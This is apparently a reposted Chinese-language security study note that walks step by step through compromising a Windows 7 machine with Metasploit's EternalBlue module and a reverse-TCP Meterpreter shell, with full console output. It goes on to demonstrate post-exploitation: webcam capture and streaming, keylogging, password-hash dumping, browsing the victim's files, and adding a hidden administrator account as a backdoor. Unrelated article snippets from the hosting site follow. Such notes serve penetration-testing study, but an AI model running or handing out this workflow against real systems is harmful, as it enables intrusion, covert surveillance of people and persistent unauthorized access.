网络安全学习笔记1

1.了解kali及安装

vmware安装,用户名密码均为kali

2.metasploit是什么

3.metasploit攻击windows系统

在kali中打来终端

数据msfconsole 进入metasploit的控制终端界面

msf的使用法则:

1.使用模块

2.配置模块必选项

3.运行模块

三步操作、实现对主流漏洞的攻击。

例子:msf6 >  search ms17_010

Matching Modules                               
================                                   #  Name                                      Disclosure Date  Rank     Check  Description                                               -  ----                                      ---------------  ----     -----  -----------                                               0  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption           1  exploit/windows/smb/ms17_010_psexec       2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution                                                              2  auxiliary/admin/smb/ms17_010_command      2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution3  auxiliary/scanner/smb/smb_ms17_010                         normal   No     MS17-010 SMB RCE DetectionInteract with a module by name or index. For example info 3, use 3 or use auxiliary/scanner/smb/smb_ms17_010                                              msf6 > use 0
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > show optionsModule options (exploit/windows/smb/ms17_010_eternalblue):Name           Current Setting  Required  Description----           ---------------  --------  -----------RHOSTS                          yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.htmlRPORT          445              yes       The target port (TCP)SMBDomain                       no        (Optional) The Windows domainto use for authentication. Only affects Windows Server 2008R2, Windows 7, Windows Embedded Standard 7 target machines.SMBPass                         no        (Optional) The password for the specified usernameSMBUser                         no        (Optional) The username to authenticate asVERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2,Windows 7, Windows Embedded Standard 7 target machines.VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7,Windows Embedded Standard 7 target machines.Payload options (windows/x64/meterpreter/reverse_tcp):Name      Current Setting  Required  Description----      ---------------  --------  -----------EXITFUNC  thread           yes       Exit technique (Accepted: '', seh,thread, process, none)LHOST     192.168.65.128   yes       The listen address (an interface may be specified)LPORT     4444             yes       The listen portExploit target:Id  Name--  ----0   Automatic TargetView the full module info with the info, or info -d command.

使用show options 查看配置项,启动requird标注为yes的为必填项

defaulting to windows/x64/meterpreter/reverse_tcp如果不是这个 可以手动配置

set payload windows/x64/meterpreter/reverse_tcp

payload就是攻击载荷。

LHOST ip地址     代表你是谁,配置为kali的ip地址

LPORT 为listentport  代表你要在kali上开启的端口。1-65535随便找,不能是占用。

View the full module info with the info, or info -d command.msf6 exploit(windows/smb/ms17_010_eternalblue) > set  RHOSTS 192.168.50.52
RHOSTS => 192.168.50.52
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lport 10001
lport => 10001
msf6 exploit(windows/smb/ms17_010_eternalblue) > run[*] Started reverse TCP handler on 192.168.50.53:10001 
[*] 192.168.50.52:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.50.52:445     - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7600 x64 (64-bit)
[*] 192.168.50.52:445     - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.50.52:445 - The target is vulnerable.
[*] 192.168.50.52:445 - Connecting to target for exploitation.
[+] 192.168.50.52:445 - Connection established for exploitation.
[+] 192.168.50.52:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.50.52:445 - CORE raw buffer dump (23 bytes)
[*] 192.168.50.52:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61  Windows 7 Ultima
[*] 192.168.50.52:445 - 0x00000010  74 65 20 37 36 30 30                             te 7600         
[+] 192.168.50.52:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.50.52:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.50.52:445 - Sending all but last fragment of exploit packet
[*] 192.168.50.52:445 - Starting non-paged pool grooming
[+] 192.168.50.52:445 - Sending SMBv2 buffers
[+] 192.168.50.52:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.50.52:445 - Sending final SMBv2 buffers.
[*] 192.168.50.52:445 - Sending last fragment of exploit packet!
[*] 192.168.50.52:445 - Receiving response from exploit packet
[+] 192.168.50.52:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.50.52:445 - Sending egg to corrupted connection.
[*] 192.168.50.52:445 - Triggering free of corrupted buffer.
[-] 192.168.50.52:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.50.52:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.50.52:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 192.168.50.52:445 - Connecting to target for exploitation.
[+] 192.168.50.52:445 - Connection established for exploitation.
[+] 192.168.50.52:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.50.52:445 - CORE raw buffer dump (23 bytes)
[*] 192.168.50.52:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61  Windows 7 Ultima
[*] 192.168.50.52:445 - 0x00000010  74 65 20 37 36 30 30                             te 7600         
[+] 192.168.50.52:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.50.52:445 - Trying exploit with 17 Groom Allocations.
[*] 192.168.50.52:445 - Sending all but last fragment of exploit packet
[*] 192.168.50.52:445 - Starting non-paged pool grooming
[+] 192.168.50.52:445 - Sending SMBv2 buffers
[+] 192.168.50.52:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.50.52:445 - Sending final SMBv2 buffers.
[*] 192.168.50.52:445 - Sending last fragment of exploit packet!
[*] 192.168.50.52:445 - Receiving response from exploit packet
[+] 192.168.50.52:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.50.52:445 - Sending egg to corrupted connection.
[*] 192.168.50.52:445 - Triggering free of corrupted buffer.
[*] Sending stage (201798 bytes) to 192.168.50.52
[*] Meterpreter session 1 opened (192.168.50.53:10001 -> 192.168.50.52:3071) at 2024-02-29 21:48:57 -0500
[+] 192.168.50.52:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.50.52:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.50.52:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

RHOSTS => 192.168.50.52

lport => 10001

run

最后

[+] 192.168.50.52:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.50.52:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.50.52:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

WIN表示已经入侵成功。

help查看能够使用的命令

meterpreter >  helpCore Commands
=============Command       Description-------       -----------?             Help menubackground    Backgrounds the current sessionbg            Alias for backgroundbgkill        Kills a background meterpreter scriptbglist        Lists running background scriptsbgrun         Executes a meterpreter script as a background threadchannel       Displays information or control active channelsclose         Closes a channeldetach        Detach the meterpreter session (for http/https)disable_unic  Disables encoding of unicode stringsode_encodingenable_unico  Enables encoding of unicode stringsde_encodingexit          Terminate the meterpreter sessionget_timeouts  Get the current session timeout valuesguid          Get the session GUIDhelp          Help menuinfo          Displays information about a Post moduleirb           Open an interactive Ruby shell on the current sessionload          Load one or more meterpreter extensionsmachine_id    Get the MSF ID of the machine attached to the sessionmigrate       Migrate the server to another processpivot         Manage pivot listenerspry           Open the Pry debugger on the current sessionquit          Terminate the meterpreter sessionread          Reads data from a channelresource      Run the commands stored in a filerun           Executes a meterpreter script or Post modulesecure        (Re)Negotiate TLV packet encryption on the sessionsessions      Quickly switch to another sessionset_timeouts  Set the current session timeout valuessleep         Force Meterpreter to go quiet, then re-establish sessionssl_verify    Modify the SSL certificate verification settingtransport     Manage the transport mechanismsuse           Deprecated alias for "load"uuid          Get the UUID for the current sessionwrite         Writes data to a channelStdapi: File system Commands
============================Command       Description-------       -----------cat           Read the contents of a file to the screencd            Change directorychecksum      Retrieve the checksum of a filecp            Copy source to destinationdel           Delete the specified filedir           List files (alias for ls)download      Download a file or directoryedit          Edit a filegetlwd        Print local working directorygetwd         Print working directorylcat          Read the contents of a local file to the screenlcd           Change local working directorylls           List local fileslmkdir        Create new directory on local machinelpwd          Print local working directoryls            List filesmkdir         Make directorymv            Move source to destinationpwd           Print working directoryrm            Delete the specified filermdir         Remove directorysearch        Search for filesshow_mount    List all mount points/logical drivesupload        Upload a file or directoryStdapi: Networking Commands
===========================Command       Description-------       -----------arp           Display the host ARP cachegetproxy      Display the current proxy configurationifconfig      Display interfacesipconfig      Display interfacesnetstat       Display the network connectionsportfwd       Forward a local port to a remote serviceresolve       Resolve a set of host names on the targetroute         View and modify the routing tableStdapi: System Commands
=======================Command       Description-------       -----------clearev       Clear the event logdrop_token    Relinquishes any active impersonation token.execute       Execute a commandgetenv        Get one or more environment variable valuesgetpid        Get the current process identifiergetprivs      Attempt to enable all privileges available to the currentprocessgetsid        Get the SID of the user that the server is running asgetuid        Get the user that the server is running askill          Terminate a processlocaltime     Displays the target system local date and timepgrep         Filter processes by namepkill         Terminate processes by nameps            List running processesreboot        Reboots the remote computerreg           Modify and interact with the remote registryrev2self      Calls RevertToSelf() on the remote machineshell         Drop into a system command shellshutdown      Shuts down the remote computersteal_token   Attempts to steal an impersonation token from the targetprocesssuspend       Suspends or resumes a list of processessysinfo       Gets information about the remote system, such as OSStdapi: User interface Commands
===============================Command       Description-------       -----------enumdesktops  List all accessible desktops and window stationsgetdesktop    Get the current meterpreter desktopidletime      Returns the number of seconds the remote user has been idlekeyboard_sen  Send keystrokesdkeyevent      Send key eventskeyscan_dump  Dump the keystroke bufferkeyscan_star  Start capturing keystrokestkeyscan_stop  Stop capturing keystrokesmouse         Send mouse eventsscreenshare   Watch the remote user desktop in real timescreenshot    Grab a screenshot of the interactive desktopsetdesktop    Change the meterpreters current desktopuictl         Control some of the user interface componentsStdapi: Webcam Commands
=======================Command       Description-------       -----------record_mic    Record audio from the default microphone for X secondswebcam_chat   Start a video chatwebcam_list   List webcamswebcam_snap   Take a snapshot from the specified webcamwebcam_strea  Play a video stream from the specified webcammStdapi: Audio Output Commands
=============================Command       Description-------       -----------play          play a waveform audio file (.wav) on the target systemPriv: Elevate Commands
======================Command       Description-------       -----------getsystem     Attempt to elevate your privilege to that of local system.Priv: Password database Commands
================================Command       Description-------       -----------hashdump      Dumps the contents of the SAM databasePriv: Timestomp Commands
========================Command       Description-------       -----------timestomp     Manipulate file MACE attributesmeterpreter > 

例如:

meterpreter > sysinfo

Computer        : SJUN-PC
OS              : Windows 7 (6.1 Build 7600).
Architecture    : x64
System Language : zh_CN
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter > 

Core Commands
=============

Core Commands
=============Command       Description-------       -----------?             Help menubackground    Backgrounds the current sessionbg            Alias for backgroundbgkill        Kills a background meterpreter scriptbglist        Lists running background scriptsbgrun         Executes a meterpreter script as a background threadchannel       Displays information or control active channelsclose         Closes a channeldetach        Detach the meterpreter session (for http/https)disable_unic  Disables encoding of unicode stringsode_encodingenable_unico  Enables encoding of unicode stringsde_encodingexit          Terminate the meterpreter sessionget_timeouts  Get the current session timeout valuesguid          Get the session GUIDhelp          Help menuinfo          Displays information about a Post moduleirb           Open an interactive Ruby shell on the current sessionload          Load one or more meterpreter extensionsmachine_id    Get the MSF ID of the machine attached to the sessionmigrate       Migrate the server to another processpivot         Manage pivot listenerspry           Open the Pry debugger on the current sessionquit          Terminate the meterpreter sessionread          Reads data from a channelresource      Run the commands stored in a filerun           Executes a meterpreter script or Post modulesecure        (Re)Negotiate TLV packet encryption on the sessionsessions      Quickly switch to another sessionset_timeouts  Set the current session timeout valuessleep         Force Meterpreter to go quiet, then re-establish sessionssl_verify    Modify the SSL certificate verification settingtransport     Manage the transport mechanismsuse           Deprecated alias for "load"uuid          Get the UUID for the current sessionwrite         Writes data to a channel

Priv: Timestomp Commands
========================

    Command       Description-------       -----------timestomp     Manipulate file MACE attributes

Priv: Password database Commands
================================

    Command       Description-------       -----------hashdump      Dumps the contents of the SAM database

Priv: Elevate Commands
======================

   

 Command       Description-------       -----------getsystem     Attempt to elevate your privilege to that of local system


                  .


Stdapi: Audio Output Commands
=============================

  Command       Description-------       -----------play          play a waveform audio file (.wav) on the target system


Stdapi: Webcam Commands
=======================

   Command       Description-------       -----------record_mic    Record audio from the default microphone for X secondswebcam_chat   Start a video chatwebcam_list   List webcamswebcam_snap   Take a snapshot from the specified webcamwebcam_strea  Play a video stream from the specified webcamm

Stdapi: User interface Commands
===============================

    Command       Description-------       -----------enumdesktops  List all accessible desktops and window stationsgetdesktop    Get the current meterpreter desktopidletime      Returns the number of seconds the remote user has been idlekeyboard_sen  Send keystrokesdkeyevent      Send key eventskeyscan_dump  Dump the keystroke bufferkeyscan_star  Start capturing keystrokestkeyscan_stop  Stop capturing keystrokesmouse         Send mouse eventsscreenshare   Watch the remote user desktop in real timescreenshot    Grab a screenshot of the interactive desktopsetdesktop    Change the meterpreters current desktopuictl         Control some of the user interface components

Stdapi: System Commands
=======================

  Command       Description-------       -----------clearev       Clear the event logdrop_token    Relinquishes any active impersonation token.execute       Execute a commandgetenv        Get one or more environment variable valuesgetpid        Get the current process identifiergetprivs      Attempt to enable all privileges available to the currentprocessgetsid        Get the SID of the user that the server is running asgetuid        Get the user that the server is running askill          Terminate a processlocaltime     Displays the target system local date and timepgrep         Filter processes by namepkill         Terminate processes by nameps            List running processesreboot        Reboots the remote computerreg           Modify and interact with the remote registryrev2self      Calls RevertToSelf() on the remote machineshell         Drop into a system command shellshutdown      Shuts down the remote computersteal_token   Attempts to steal an impersonation token from the targetprocesssuspend       Suspends or resumes a list of processessysinfo       Gets information about the remote system, such as OS

Stdapi: Networking Commands
===========================

   

 Command       Description-------       -----------arp           Display the host ARP cachegetproxy      Display the current proxy configurationifconfig      Display interfacesipconfig      Display interfacesnetstat       Display the network connectionsportfwd       Forward a local port to a remote serviceresolve       Resolve a set of host names on the targetroute         View and modify the routing table

Stdapi: File system Commands
============================

   

 Command       Description-------       -----------cat           Read the contents of a file to the screencd            Change directorychecksum      Retrieve the checksum of a filecp            Copy source to destinationdel           Delete the specified filedir           List files (alias for ls)download      Download a file or directoryedit          Edit a filegetlwd        Print local working directorygetwd         Print working directorylcat          Read the contents of a local file to the screenlcd           Change local working directorylls           List local fileslmkdir        Create new directory on local machinelpwd          Print local working directoryls            List filesmkdir         Make directorymv            Move source to destinationpwd           Print working directoryrm            Delete the specified filermdir         Remove directorysearch        Search for filesshow_mount    List all mount points/logical drivesupload        Upload a file or directory
用户操作:Stdapi: User interface Commands(用户接口命令)enumdesktops    -->列出所有可访问的桌面和窗口站(窗体列表)
getdesktop      -->得到当前的Meterpreter桌面idletime        -->返回秒远程用户已经闲置数量keyscan_dump    -->转储按键缓冲(下载键盘记录)
keyscan_start   -->开始捕获击键(开始键盘记录)
keyscan_stop    -->停止捕获击键(停止键盘记录)
screenshot      -->抓取交互式桌面截图(当前操作界面截图一张)
setdesktop      -->改变meterpreters当前桌面uictl           -->控制一些用户界面组件(获取键盘、鼠标控制权)
使用uictl -h 查看帮助(打开/关闭,键盘/鼠标)PS:键盘记录注意点,先开始,后下载,再结束,否则会出错摄像头:Stdapi: Webcam Commands(摄像头命令)record_mic       -->X秒从默认的麦克风record_mic音频记录(音频录制)webcam_chat      -->开始视频聊天(视频,对方会有弹窗)webcam_list      -->单摄像头(查看摄像头列表)
webcam_snap      -->采取快照从指定的摄像头(摄像头拍摄一张照片)webcam_stream    -->播放视频流从指定的摄像头(开启摄像头监控)其他命令操作getsystem        -->获取高权限hashdump         -->获取当前用户hash

例子:创建后门用户并开启远程连接

shell

net user zhangsan  123456 /add

net localgroup administrators zhangsan /add

在攻陷的机器上添加用户zhangsan密码为123456 并且把张三的用户加入到管理员组。

exit退出

screenshot  来进行截图屏幕

meterpreter > webcam_snap  

->采取快照从指定的摄像头(摄像头拍摄一张照片)

[*] Starting...
[+] Got frame
[*] Stopped
Webcam shot saved to: /home/kali/Desktop/rJfZoIoR.jpeg

meterpreter > webcam_stream   

 -->播放视频流从指定的摄像头(开启摄像头监控)

[*] Starting...
[*] Preparing player...
[*] Opening player at: /home/kali/Desktop/wViPebHU.html
[*] Streaming...
^CInterrupt
[-] webcam_stream: Interrupted
meterpreter > Interrupt: use the 'exit' command to quit

查看文件meterpreter > dir d:/
Listing: d:/

============Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
040777/rwxrwxrwx  0      dir   2023-05-18 23:55:43 -0400  $QAXHoneypot
040777/rwxrwxrwx  0      dir   2022-07-26 03:39:58 -0400  $RECYCLE.BIN
040777/rwxrwxrwx  0      dir   2023-05-16 04:32:30 -0400  Program Files
040777/rwxrwxrwx  4096   dir   2023-12-21 20:19:47 -0500  Program Files (x86)
040777/rwxrwxrwx  0      dir   2023-05-18 23:12:52 -0400  QAXDownload
040777/rwxrwxrwx  0      dir   2018-03-22 23:27:06 -0400  System Volume Information
100666/rw-rw-rw-  14141  fil   2020-08-05 03:14:06 -0400  ZB-SAN-SW-24.xlsx
100666/rw-rw-rw-  18077  fil   2021-06-14 02:09:44 -0400  ZB-交换机端口映射.xlsx
040777/rwxrwxrwx  12288  dir   2023-05-18 23:54:46 -0400  tools工具
040777/rwxrwxrwx  4096   dir   2020-04-29 02:55:45 -0400  个人文件
100666/rw-rw-rw-  15818  fil   2021-12-23 01:39:22 -0500  容灾IP地址分配.xlsx
040777/rwxrwxrwx  4096   dir   2023-05-18 23:55:02 -0400  封存项目
040777/rwxrwxrwx  4096   dir   2023-05-18 23:56:14 -0400  工作区域

meterpreter > cat c:/1.txt  查看文件内容
123
meterpreter > 

meterpreter > mkdir d:\ly 创建目录
Creating directory: d:ly
 

2.文件系统命令
cat c:\boot.ini#查看文件内容,文件必须存在
del c:\boot.ini #删除指定的文件
upload /root/Desktop/netcat.exe c:\ # 上传文件到目标机主上,如upload  setup.exe C:\\windows\\system32\
download nimeia.txt /root/Desktop/   # 下载文件到本机上如:download C:\\boot.ini /root/或者download C:\\"ProgramFiles"\\Tencent\\QQ\\Users\\295******125\\Msg2.0.db /root/
edit c:\boot.ini  # 编辑文件
getlwd#打印本地目录
getwd#打印工作目录
lcd#更改本地目录
ls#列出在当前目录中的文件列表
lpwd#打印本地目录
pwd#输出工作目录
cd c:\\ #进入目录文件下
rm file #删除文件
mkdir dier #在受害者系统上的创建目录
rmdir#受害者系统上删除目录
dir#列出目标主机的文件和文件夹信息
mv#修改目标主机上的文件名
search -d d:\\www -f web.config #search 文件,如search  -d c:\\  -f*.doc
meterpreter > search -f autoexec.bat  #搜索文件
meterpreter > search -f sea*.bat c:\\xamp\\
enumdesktops     #用户登录数1)下载文件
使用命令“download +file path”,将下载目标机器的相对应权限的任何路径下的文件
(2)上传文件
“upload”命令为上传文件到我们的目标机器,在图中我们上传了ll.txt到目标机器的c:\pp\下。
(3)查看文件
“cat filename”在当前目录下查看文件内容,输入命令后便会返回给我们所查看文件的内容。
(4)切换、查询当前路径
“pwd”命令将查询当前在dos命令下的路径,“cd”命令可以改变当前路径,如下图中cd ..为切换到当前路径下的上一目录。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/714315.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

逻辑回归与交叉熵--九五小庞

什么是逻辑回归 线性回归预测的是一个连续值,逻辑回归给出的“是”和“否”的回答 Singmoid sigmoid函数是一个概率分布函数,给定某个输入,它将输出为一个概率值 逻辑回归损失函数 平方差所惩罚的是与损失为同一数量级的情形&#xff0…

8、Redis-Jedis、Lettuce和一个Demo

目录 一、Jedis 二、Lettuce 三、一个Demo Java集成Redis主要有3个方案:Jedis、Lettuce和Redisson。 其中,Jedis、Lettuce侧重于单例Redis,而Redisson侧重于分布式服务。 项目资源在文末 一、Jedis 1、创建SpringBoot项目 2、引入依赖 …

电商小程序10分类管理

目录 1 分类数据源2 搭建功能3 创建变量读取数据4 绑定数据总结 本篇我们介绍一下电商小程序的分类管理功能的开发,先看我们的原型图: 在首页我们是展示了四个分类的内容,采用上边是图标,下边是文字的形式。使用低代码开发&#…

【系统分析师】-需求工程

一、需求工程 需求工程分为需求开发和需求管理。 需求开发:需求获取,需求分析,需求定义、需求验证。 需求管理:变更控制、版本控制、需求跟踪,需求状态跟踪。(对需求基线的管理) 1.1需求获取…

MySQL:合并查询语句

1、查询表的数据 t_book表数据 SELECT * FROM db_book.t_book; t_booktype表数据 SELECT * FROM db_book.t_booktype; 提醒: 下面的查询操作的数据来自上图查询表的数据 2. 使用 UNION 查询结果合并,会去掉重复的数据 使用UNION关键字是,数…

社区店经营口号大揭秘:如何吸引更多顾客?

社区店的经营口号是吸引顾客的重要工具,一个好的口号能够在短时间内传达店铺的特色和价值,并引起顾客的兴趣。 作为一名开鲜奶吧5年的创业者,我将分享一些关于社区店经营口号的干货,帮助你吸引更多的顾客。 1、突出独特卖点&…

群控代理IP搭建教程:打造一流的网络爬虫

目录 前言 一、什么是群控代理IP? 二、搭建群控代理IP的步骤 1. 获取代理IP资源 2. 配置代理IP池 3. 选择代理IP策略 4. 编写代理IP设置代码 5. 异常处理 三、总结 前言 群控代理IP是一种常用于网络爬虫的技术,通过使用多个代理IP实现并发请求…

优思学院|3步骤计算出Cpk|学习Minitab

在生产和质量管理中,准确了解和控制产品特性至关重要。一个关键的工具是Cpk值,它是衡量生产过程能力的重要指标。假设我们有一个产品特性的规格是5.080.02,通过收集和分析过程数据,我们可以计算出Cpk值,进而了解生产过…

CentOS 定时调度

文章目录 一、场景说明二、脚本职责三、参数说明四、操作示例五、注意事项 一、场景说明 本自动化脚本旨在为提高研发、测试、运维快速部署应用环境而编写。 脚本遵循拿来即用的原则快速完成 CentOS 系统各应用环境部署工作。 统一研发、测试、生产环境的部署模式、部署结构、…

docker配置数据默认存储路径graph已过时,新版本中是data-root

错误信息 我在修改/etc/docker/daemon.json文件中,添加存储路径graph字段。然后sudo systemctl restart docker包如下错误:使用journalctl -xeu docker.service错误信息,发现不能匹配graph字段。 原因 我的docker版本: 在doc…

TypeScript08:在TS中使用模块化

前言:tsconfig.json中的配置 一、前端领域中的模块化标准 前端领域中的模块化标准有: ES6、commonjs、amd、umd、system、esnext 二、 TS中如何书写模块化语句 TS 中,导入和导出模块,统一使用 ES6 的模块化标准。 myModule.ts &a…

Keil新版本安装编译器ARMCompiler 5.06

0x00 缘起 我手头的项目在使用最新版本的编译器后,烧录后无法正常运行,故安装5.06,测试后发现程序运行正常,以下为编译器的安装步骤。 0x01 解决方法 1. 下载编译器安装文件,可以去ARM官网下载,也可以使用我…

蓝桥杯练习系统(算法训练)ALGO-993 RP大冒险

资源限制 内存限制:64.0MB C/C时间限制:200ms Java时间限制:600ms Python时间限制:1.0s 问题描述 请尽情使用各种各样的函数来测试你的RP吧~~~ 输入格式 一个数N表示测点编号。 输出格式 一个0~9的数。 样例输入 0 样…

【airtest】自动化入门教程(三)Poco操作

目录 一、准备工作 1、创建一个pthon脚本 2、光标位置 2、选择Android 3、选择yes 二、定位元素 三、poco基于设备/屏幕 方式 1、poco.click( (x,y))基于屏幕点击相对坐标为x,y的位置 2、poco.get_screen_size() 3、poco.swipe(v1,v2)基于屏幕从v1位置滑到…

02.刚性事务

刚性事务 1.DTP模型 X/Open组织介绍 X/OPEN是一个组织(现在的open group)X/Open国际联盟有限公司是一个欧洲基金会,它的建立是为了向UNIX环境提供标准。它主要的目标是促进对UNIX语言、接口、网络和应用的开放式系统协议的制定。它还促进在…

初识C语言—常见关键字

变量的命名最好有意义 名字必须是字母&#xff0c;数字&#xff0c;下划线组成&#xff0c;不能有特殊字符&#xff0c;同时不能以数字开头 变量名不能是关键字 typedef---类型定义&#xff0c;类型重命名 #include <stdio.h>typedef unsigned int uint; //将unsigne…

ubuntu20.04设置docker容器开机自启动

ubuntu20.04设置docker容器开机自启动 1 docker自动启动2 容器设置自动启动3 容器自启动失败处理 1 docker自动启动 &#xff08;1&#xff09;查看已启动的服务 $ sudo systemctl list-units --typeservice此命令会列出所有当前加载的服务单元。默认情况下&#xff0c;此命令…

Python自动化测试基础必备知识点总结

一、自动化测试的概念 性能系统负载能力稳定性过载操作下的系统瓶颈自动化测试&#xff0c;使用程序代替人工&#xff0c;可以提高测试效率性&#xff0c;自动化测试能自动化使用代码模拟大量用户&#xff0c;让用户请求多页和多用户并发请求收集参数&#xff0c;并对系统负载…

设计模式七:责任链模式

文章目录 1、责任链模式2、spring中的责任链模式Spring InterceptorServlet FilterNetty 1、责任链模式 责任链模式为请求创建了一个接收者对象的链&#xff0c;在这种模式下&#xff0c;通常每个节点都包含对另一个节点者的引用。每个节点针对请求&#xff0c;处理自己感兴趣…

openGauss学习笔记-233 openGauss性能调优-系统调优-资源负载管理-资源管理准备-启动资源负载管理功能

文章目录 openGauss学习笔记-233 openGauss性能调优-系统调优-资源负载管理-资源管理准备-启动资源负载管理功能233.1 背景信息233.2 前提条件233.3 操作步骤 openGauss学习笔记-233 openGauss性能调优-系统调优-资源负载管理-资源管理准备-启动资源负载管理功能 233.1 背景信…